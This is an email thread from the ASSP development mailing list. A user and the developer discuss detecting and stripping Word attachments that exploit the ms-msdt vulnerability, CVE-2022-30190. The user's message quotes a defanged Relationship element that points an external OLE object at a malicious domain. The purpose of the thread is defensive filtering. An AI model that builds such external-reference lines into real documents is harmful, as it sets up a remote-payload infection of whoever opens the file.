Thanks for getting back with me Thomas. I know that we can't block ms-msdt
because that's downloaded by Word after opening the file, but I was talking
about blocking files that have the URI reference, like:
<Relationship Id="rId996" Type="
http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject";
Target="hxxps://www[.]xmlformats[.]com/office/word/2022/wordprocessingDrawing/RDF842l.html!"
TargetMode="External"/>
Basically, if a document has an external reference, strip the file out of
the email, essentially inspecting it like we do .docx files looking for bad
content - similar to removing a PDF that contains javascript.
On Mon, Jun 13, 2022 at 3:55 AM Thomas Eckardt <thomas.ecka...@thockar.com>
wrote:
> This is not possible because:
>
> ....
> Note that the suspicious scheme ("ms-msdt:/")* is** not **present in the
> document*. It's present in the first stage payload that will be
> downloaded by Office.
> ....
> and
> ....
> The document contains an external reference *pointing to a malicious URL*:
> ....
>
> If the malicious URL is known, it can be detected by assp using URIBL.
> Keep in mind that those malicious URL's can be generated and changed very
> quickly!
>
> >Hopefully clamav will eventually catch it,
>
> I don't think this is possible for every case. Also traditional AV
> scanners need to know all used malicious URL's. Only a behavior analysis of
> the document will be able to detect the malicious download and playload.
>
>
> Solutions for CVE-2022-30190 are provided by Microsoft:
>
>
> https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
>
> Thomas
>
>
>
> Von: "K Post" <nntp.p...@gmail.com>
> An: "ASSP development mailing list" <
> assp-test@lists.sourceforge.net>
> Datum: 31.05.2022 20:14
> Betreff: [Assp-test] blocking new MS doc vunerability (URI attack
> vector)
> ------------------------------
>
>
>
> Hello Thomas,
>
> Any way for ASSP to block this kind of thing?
>
>
> *https://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme+CVE202230190/28694*
> <https://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme+CVE202230190/28694>
>
> Hopefully clamav will eventually catch it, but be nice great to be able
> strip documents off using AFC if they contain the URI protocol, just like
> we do for VBA code, etc.
>
> Thanks_______________________________________________
> Assp-test mailing list
> Assp-test@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/assp-test
>
>
>
>
> DISCLAIMER:
> *******************************************************
> This email and any files transmitted with it may be confidential, legally
> privileged and protected in law and are intended solely for the use of the
> individual to whom it is addressed.
> This email was multiple times scanned for viruses. There should be no
> known virus in this email!
> *******************************************************
>
> _______________________________________________
> Assp-test mailing list
> Assp-test@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/assp-test
>
_______________________________________________
Assp-test mailing list
Assp-test@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/assp-test
